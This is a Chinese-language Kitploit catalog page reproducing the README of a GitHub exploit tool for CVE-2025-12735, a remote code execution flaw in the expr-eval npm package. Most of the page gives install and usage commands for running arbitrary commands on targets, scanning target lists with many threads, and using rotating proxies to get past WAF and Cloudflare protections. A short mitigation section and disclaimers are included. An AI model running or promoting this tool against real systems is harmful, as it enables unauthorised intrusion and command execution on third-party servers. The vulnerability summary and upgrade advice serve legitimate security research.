Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-12735-expr-eval-rce — 用于检测和测试 CVE-2025-12735 (expr-eval RCE 漏洞) 的安全研究工具 | Kitploit
工具/GitHubGitHub/an5i/cve-2025-12735-expr-eval-rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHuban5i/cve-2025-12735-expr-eval-rce

cve-2025-12735-expr-eval-rce

用于检测和测试 CVE-2025-12735 (expr-eval RCE 漏洞) 的安全研究工具

查看仓库
119个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-12735 expr-eval RCE 漏洞利用工具

一个用于检测和测试 expr-eval 与 expr-eval-fork npm 包中 CVE-2025-12735 漏洞的安全研究工具。

⚠️ 免责声明

本工具仅用于授权的安全测试和教育目的。未经授权访问计算机系统是违法的。请仅在你拥有或已获得明确书面测试许可的系统上使用本工具。

📋 概述

CVE-2025-12735 是 expr-eval 和 expr-eval-fork npm 包中的一个严重远程代码执行漏洞。该漏洞允许攻击者在解析器使用的 context 对象内定义任意函数,从而注入执行系统级命令的恶意代码。

CVSS 评分: 9.8(严重)
受影响版本: expr-eval-fork < 3.0.0
修复版本: expr-eval-fork v3.0.0+

🔍 功能特性

  • 自动检测: 扫描 JavaScript 文件中 expr-eval 库的使用情况
  • 端点发现: 自动查找评估端点
  • 漏洞测试: 测试 CVE-2025-12735 漏洞
  • 命令执行: 演示 RCE 能力(用于授权测试)
  • 多线程支持: 并行扫描多个目标
  • 代理支持: 绕过 WAF/Cloudflare 限制
  • JSON 导出: 以 JSON 格式输出详细结果

📦 安装

前置条件

  • Python 3.6 或更高版本
  • pip(Python 包管理器)

快速安装

root@kitploit:~
# 克隆仓库
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce

# 安装依赖
pip install -r requirements.txt

# 使脚本可执行(可选)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py

替代方案:直接下载

root@kitploit:~
# 下载脚本
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py

# 安装依赖
pip install requests

🚀 使用方法

基本用法

root@kitploit:~
# 单个目标
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com

# 执行自定义命令
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"

# 从文件读取多个目标
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

# 使用多线程加快扫描速度
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5

# 详细输出便于调试
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v

使用代理

root@kitploit:~
# 单个代理
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port

# 从文件读取多个代理
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

命令行选项

root@kitploit:~
-u, --url          目标 URL
-f, --file         包含目标 URL 的文件(每行一个)
-c, --command      要执行的命令(默认:id)
-t, --threads      线程数(默认:1)
-o, --output       输出文件(默认:uknf_expr_eval_results.json)
-v, --verbose      启用详细日志
--proxy            代理 URL(例如 http://127.0.0.1:8080)
--proxy-list       包含代理 URL 的文件(每行一个)

📊 输出

脚本会生成一个包含详细结果的 JSON 文件:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:35:32.638109",
  "expr_eval_detected": true,
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/api/evaluate"
}

🔬 工作原理

  1. 检测阶段: 扫描 JavaScript 文件和 HTML 内容中 expr-eval 的引用
  2. 端点发现: 测试可能使用 expr-eval 的常见 API 端点
  3. 漏洞测试: 尝试在 context 对象中注入任意函数
  4. 攻击利用: 如果存在漏洞,演示 RCE 能力

🛡️ 缓解措施

如果你正在使用 expr-eval 或 expr-eval-fork:

  1. 立即升级:

    root@kitploit:~
    npm install expr-eval-fork@latest
    
  2. 应用安全补丁:

    • 将 Pull Request #288 应用到 expr-eval
    • 或切换到 expr-eval-fork v3.0.0+
  3. 实施输入验证:

    • 清理所有用户输入
    • 使用函数白名单
    • 验证 context 对象

📚 参考资料

  • CVE: CVE-2025-12735
  • CERT: VU#263614
  • GitHub 安全公告: GHSA-jc85-fpwf-qm7x
  • 安全补丁: PR #288

📖 示例

示例 1:单个目标扫描

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com

示例 2:多个目标并输出

root@kitploit:~
# 创建目标文件
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# 运行扫描
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

示例 3:自定义命令执行

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"

示例 4:使用代理

root@kitploit:~
# 单个代理
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080

# 从文件读取多个代理
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

🤝 贡献

欢迎贡献!请随时提交 Pull Request。

  1. Fork 该仓库
  2. 创建你的功能分支(git checkout -b feature/AmazingFeature)
  3. 提交你的更改(git commit -m '添加一些AmazingFeature')
  4. 推送到分支(git push origin feature/AmazingFeature)
  5. 提交 Pull Request

🐛 问题

如果遇到任何问题或有建议,请在 GitHub 上提交 issue。

📝 许可

本项目采用 MIT 许可证 - 详情请参见 LICENSE 文件。

⭐ Star 历史

如果你觉得这个工具有用,请考虑在 GitHub 上给它一个 star!

⚖️ 法律声明

本工具仅用于教育和授权的安全测试目的。作者不对因使用本程序而导致的任何滥用或损害负责。用户有责任确保在测试任何系统之前已获得适当的授权。

🙏 致谢

  • 原始漏洞报告者:Jangwoo Choe (UKO)
  • CERT 协调中心:负责漏洞披露
  • GitHub Security 和 npm:负责安全公告

💰 捐助

如果你觉得这个工具有用,并希望支持该项目:

比特币 (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

以太坊 (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

感谢你的支持!🙏

下载工具